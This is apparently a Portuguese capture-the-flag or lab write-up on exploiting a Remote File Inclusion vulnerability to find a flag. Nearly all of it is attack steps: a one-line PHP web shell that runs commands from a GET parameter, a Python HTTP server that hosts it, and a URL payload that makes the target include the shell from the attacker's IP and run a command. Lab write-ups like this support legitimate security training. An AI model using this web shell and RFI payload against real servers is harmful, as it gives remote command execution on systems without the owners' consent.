RFI - 1

  1. Ataque o alvo, obtenha a execução do comando explorando a vulnerabilidade RFI e, em seguida, procure o sinalizador em um dos diretórios em /

  • Vamos escrever o nosso web shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php
  • Vamos iniciar um servidor http

sudo python3 -m http.server <LISTENING_PORT>
  • Agora, podemos incluir nosso shell local por meio de RFI, como fizemos antes, mas usando <OUR_IP>e nosso <LISTENING_PORT>. Também especificaremos o comando a ser executado com &cmd=id:

Pyload :

http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

Last updated